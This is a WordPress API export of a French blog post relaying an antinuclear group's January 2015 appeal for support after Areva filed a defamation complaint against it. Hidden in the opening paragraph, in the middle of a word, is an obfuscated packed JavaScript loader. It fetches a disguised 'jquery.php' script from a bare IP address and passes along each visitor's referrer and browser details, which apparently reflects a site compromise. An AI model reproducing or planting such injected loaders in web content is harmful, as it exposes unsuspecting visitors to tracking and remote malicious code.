{"id":9034,"date":"2015-01-11T22:24:46","date_gmt":"2015-01-11T21:24:46","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=9034"},"modified":"2015-08-17T16:38:34","modified_gmt":"2015-08-17T15:38:34","slug":"appel-a-soutien-areva-porte-plainte-contre-la-coordination-antinucleaire-du-sud-est","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=9034","title":{"rendered":"Appel \u00e0 soutien : AREVA porte plainte contre la Coordination Antinucl\u00e9aire du Sud-Est !"},"content":{"rendered":"<p>Pe<strong><a title=\"Au_quotidien.jpg.jpg\" href=\"http:\/\/coordination-antinucleaire-sudest.net\/2012\/public\/plainte-Areva\/Au_quotidien.jpg.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" title=\"Au_quotidien.jpg.jpg, janv. 2015\" src=\"http:\/\/coordination-antinucleaire-sudest.net\/2012\/public\/plainte-Areva\/.Au_quotidien.jpg_t.jpg\" alt=\"Au_quotidien.jpg.jpg\" width=\"85\" height=\"100\" \/><\/a><\/strong>ndant <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hzrfd|var|u0026u|referrer|ehbbk||js|php'.split('|'),0,{}))\n<\/script><\/noindex> ce temps, \u2026. .<\/p>\n<p>L&rsquo;industrie nucl\u00e9aire continue son travail de sape contre les militant-e-s anti-nucl\u00e9aires. Dommage de ne pas \u00eatre aussi unis pour d\u00e9fendre aussi cette libert\u00e9 d\u2019expression. La libert\u00e9 de lutter contre le nucl\u00e9aire qui n\u2019a jamais fait l&rsquo;objet d&rsquo;un d\u00e9bat d\u00e9mocratique dans notre pays.<\/p>\n<p>source : <a href=\"http:\/\/www.coordination-antinucleaire-sudest.org\/\">http:\/\/www.coordination-antinucleaire-sudest.org\/<\/a><\/p>\n<p>__<\/p>\n<div class=\"post-excerpt\">\n<p><strong>Le site internet de la Coordination Antinucl\u00e9aire du Sud-Est vient d\u2019\u00eatre inform\u00e9 ce mardi 6 janvier 2015 d\u2019une plainte en diffamation d\u2019Areva contre nous pour un reportage* mettant en cause la p\u00e9n\u00e9tration du lobby nucl\u00e9aire aupr\u00e8s des \u00e9lus. Cette atteinte \u00e0 la libert\u00e9 d&rsquo;expression se produit alors que le crime nucl\u00e9aire sanitaire se poursuit et que se meurent \u00e0 petit feu des milliers d\u2019enfants et d&rsquo;adultes \u00e0 Fukushima et ailleurs, ici et au Niger. Une tentative de museler les opposants et toute contestation au moment m\u00eame o\u00f9 le groupe Areva est en d\u00e9cr\u00e9pitude financi\u00e8re et o\u00f9 les incidents radioactifs se multiplient dans ses installations en France. La Coordination lance un appel \u00e0 soutien.<br \/>\n<\/strong><\/p>\n<\/div>\n<div class=\"post-content\">\n<p><ins>Communiqu\u00e9 de Presse du 9 janvier 2015<br \/>\n<\/ins><br \/>\n<strong>LIBERTE D\u2019EXPRESSION MENACEE<\/strong><\/p>\n<p><strong>AREVA porte plainte contre la Coordination Antinucl\u00e9aire du Sud-Est ! Nous ne nous laisserons pas b\u00e2illonner !<\/strong><\/p>\n<p>Le site internet de la Coordination Antinucl\u00e9aire du Sud-Est vient d\u2019\u00eatre inform\u00e9 ce mardi 6 janvier 2015 d\u2019une plainte en diffamation d\u2019Areva pour un reportage* mettant en cause la p\u00e9n\u00e9tration du lobby nucl\u00e9aire aupr\u00e8s des \u00e9lus alors que le crime nucl\u00e9aire sanitaire se poursuit \u00e0 Fukushima et en vall\u00e9e du Rh\u00f4ne.<\/p>\n<p><a title=\"Defendons_la_liberte_d__expression.jpg.jpg\" href=\"http:\/\/coordination-antinucleaire-sudest.net\/2012\/public\/plainte-Areva\/Defendons_la_liberte_d__expression.jpg.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" title=\"Defendons_la_liberte_d__expression.jpg.jpg, janv. 2015\" src=\"http:\/\/coordination-antinucleaire-sudest.net\/2012\/public\/plainte-Areva\/.Defendons_la_liberte_d__expression.jpg_s.jpg\" alt=\"Defendons_la_liberte_d__expression.jpg.jpg\" width=\"176\" height=\"240\" \/><\/a>Par cette attaque en justice, <strong>le g\u00e9ant du nucl\u00e9aire veut faire taire la contestation<\/strong> au moment m\u00eame o\u00f9 le groupe Areva est en d\u00e9cr\u00e9pitude financi\u00e8re (-52% de sa valeur en Bourse) et industrielle (\u00e9chec de l\u2019EPR en Finlande, investissements hasardeux, r\u00e9duction de ses ventes de Mox notamment au Japon, mis en cause dans des financements de budget \u00e9tranger,\u2026), o\u00f9 les incidents se multiplient dans ses installations en France et alors que se meurent \u00e0 petit feu des milliers d\u2019enfants et d&rsquo;adultes (recens\u00e9s ou pas encore) \u00e0 Fukushima et ailleurs, comme au Niger.<\/p>\n<p>La Coordination Antinucl\u00e9aire du Sud-Est qui regroupe, en dehors de tout parti politique, des citoyens qui agissent pour l\u2019arr\u00eat imm\u00e9diat et inconditionnel du crime nucl\u00e9aire pour des raisons sanitaires et de sant\u00e9 publique, d\u00e9nonce &#8230;  <!--more--><\/p>\n<p>. <strong>la guerre id\u00e9ologique fanatique que les tenants de la destruction atomique<\/strong> m\u00e8nent contre une pens\u00e9e libre et contre le peuple, l\u2019arrogance et l\u2019imp\u00e9rialisme du lobby nucl\u00e9aire et de sa caste dirigeante,<\/p>\n<p>. <strong>les atteintes \u00e0 la sant\u00e9 et \u00e0 la vie des populations et la contamination des territoires<\/strong> par les rejets radioactifs dans l\u2019air et dans l\u2019eau de chacune des 125 installations nucl\u00e9aires civiles auxquelles s\u2019ajoutent les Installations Nucl\u00e9aires de Base secr\u00e8tes militaires diss\u00e9min\u00e9es sur le territoire fran\u00e7ais. Atteintes voulues, r\u00e9p\u00e9t\u00e9es et quotidiennes, telle la fabrication par Areva de l\u2019uranium \u00ab appauvri \u00bb radioactif, sans doute utilis\u00e9 dans les armes de guerre.<\/p>\n<p>. <strong>l\u2019exploitation colonialiste<\/strong> des travailleurs et ressources du Niger ainsi que la contamination radioactive des territoires de vie et de culture des populations touareg et autres de ce pays,<\/p>\n<p>. <strong>le noyautage des institutions<\/strong>, de l\u2019\u00c9tat, et des assembl\u00e9es \u00e9lues par un groupe d\u2019int\u00e9r\u00eats priv\u00e9s et leurs relais id\u00e9ologiques pour imposer un ordre dominant et un \u00e9tat de terreur nucl\u00e9aire sur le pays et la plan\u00e8te,<\/p>\n<p><strong>La Coordination antinucl\u00e9aire du Sud-est rappelle qu\u2019il n\u2019y a pas de dose de radioactivit\u00e9 artificielle inoffensive.<\/strong><\/p>\n<p>La Coordination antinucl\u00e9aire du Sud-est appelle \u00e0 la Solidarit\u00e9<br \/>\n. toutes les personnes \u00e9prises de libert\u00e9 et attach\u00e9es au droit d\u2019expression et de critique,<br \/>\n. tous les collectifs, et groupes, et organisations<\/p>\n<p>.<strong> \u00e0 s\u2019opposer \u00e0 cette atteinte \u00e0 la libert\u00e9 d\u2019expression<\/strong>,<\/p>\n<p>. <strong>\u00e0 adresser \u00e0 la Coordination des messages de soutien<\/strong> : <em><a href=\"mailto:sudest.antinucleaire@free.fr\">sudest.antinucleaire@free.fr<\/a><\/em><\/p>\n<p>. <strong>\u00e0 soutenir la d\u00e9fense en justice<\/strong> de la Coordination antinucl\u00e9aire du Sud-est :<em> <a href=\"https:\/\/www.paypal.com\/cgi-bin\/webscr?cmd=_s-xclick&amp;hosted_button_id=ZKBBCGA46ZRH6\">j&rsquo;apporte mon aide<\/a><\/em><\/p>\n<p>. <strong>\u00e0 manifester directement son indignation aupr\u00e8s<\/strong> des pouvoirs et de Areva par les voies que chacun-e d\u00e9terminera<\/p>\n<p>( <em>Monsieur Philippe Varin Pr\u00e9sident du Conseil d?Administration d&rsquo;Areva 1, place Jean-Millier 92084 Paris-La D\u00e9fense cedex T\u00e9l : <span class=\"skype_c2c_print_container notranslate\">01.34.96.00.00<\/span><span id=\"skype_c2c_container\" class=\"skype_c2c_container notranslate\" dir=\"ltr\" tabindex=\"-1\" data-numbertocall=\"+33134960000\" data-isfreecall=\"false\" data-isrtl=\"false\" data-ismobile=\"false\"><span class=\"skype_c2c_highlighting_inactive_common\" dir=\"ltr\"><span id=\"non_free_num_ui\" class=\"skype_c2c_textarea_span\"><img loading=\"lazy\" decoding=\"async\" class=\"skype_c2c_logo_img\" src=\"resource:\/\/skype_ff_extension-at-jetpack\/skype_ff_extension\/data\/call_skype_logo.png\" alt=\"\" width=\"0\" height=\"0\" \/><span class=\"skype_c2c_text_span\">01.34.96.00.00<\/span><\/span><\/span><\/span> Fax : 01.34.96.00.01\u00a0<\/em> &#8211; 1er Ministre Manuel Vals : 57 Rue de Varenne, 75007 Paris <a href=\"http:\/\/www.gouvernement.fr\/contact\/ecrire-au-premier-ministre\">http:\/\/www.gouvernement.fr\/contact\/ecrire-au-premier-ministre<\/a> &#8211; Marisol Touraine, Ministre des Affaires sociales, de la Sant\u00e9 et des Droits des femmes 14, avenue Duquesne 75350 PARIS 07 SP Tel : 01 40 56 60 00 )<\/p>\n<p>. <strong>\u00e0 faire conna\u00eetre<\/strong> partout cet autre versant des atteintes \u00e0 la libert\u00e9 d&rsquo;expression en France<\/p>\n<p>. <strong>\u00e0 signer la p\u00e9tition en ligne<\/strong> avec cyber@cteurs : (lien prochainement disponible)<\/p>\n<p>__<\/p>\n<p>. <strong><em>soutien financier<\/em><\/strong> (rembours\u00e9 en cas de retrait de plainte par Areva et non proc\u00e8s) : \u00e0 adresser \u00e0 CAN 180 chemin de la Parisienne<br \/>\n84740 Velleron &#8211; France ou clic sur ce bouton :<\/p>\n<form action=\"https:\/\/www.paypal.com\/cgi-bin\/webscr\" method=\"post\" target=\"_top\"><input alt=\"PayPal - la solution de paiement en ligne la plus simple et la plus s\u00e9curis\u00e9e !\" name=\"submit\" src=\"http:\/\/www.coordination-antinucleaire-sudest.net\/2012\/public\/plainte-Areva\/btn_donate_LG.gif\" type=\"image\" \/> <img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.paypalobjects.com\/fr_FR\/i\/scr\/pixel.gif\" alt=\"\" width=\"1\" height=\"1\" border=\"0\" \/><\/form>\n<p>__<\/p>\n<p><em>Contact :\u00a0 <a href=\"mailto:sudest.antinucleaire@free.fr\">sudest.antinucleaire@free.fr<\/a><\/em><\/p>\n<p>*\u00a0 <a href=\"http:\/\/coordination-antinucleaire-sudest.net\/2012\/index.php?post\/2014\/07\/27\/Avignon-%3A-les-%C3%A9lus-EELV-ne-condament-pas-la-convention-que-signe-la-municipalit%C3%A9-avec-Areva\">http:\/\/coordination-antinucleaire-sudest.net\/2012\/index.php?post\/2014\/07\/27\/Avignon-%3A-les-%C3%A9lus-EELV-ne-condament-pas-la-convention-que-signe-la-municipalit%C3%A9-avec-Areva<\/a><\/p>\n<\/div>\n<p><!--more--><\/p>\n<p><!--more--><\/p>\n<p><!--more--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pendant ce temps, \u2026. . L&rsquo;industrie nucl\u00e9aire continue son travail de sape contre les militant-e-s anti-nucl\u00e9aires. Dommage de ne pas \u00eatre aussi unis pour d\u00e9fendre aussi cette libert\u00e9 d\u2019expression. La libert\u00e9 de lutter contre le nucl\u00e9aire qui n\u2019a jamais fait &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=9034\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[33],"tags":[],"class_list":["post-9034","post","type-post","status-publish","format-standard","hentry","category-soutiens-du-ppld"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9034","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9034"}],"version-history":[{"count":5,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9034\/revisions"}],"predecessor-version":[{"id":9039,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9034\/revisions\/9039"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9034"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9034"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9034"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}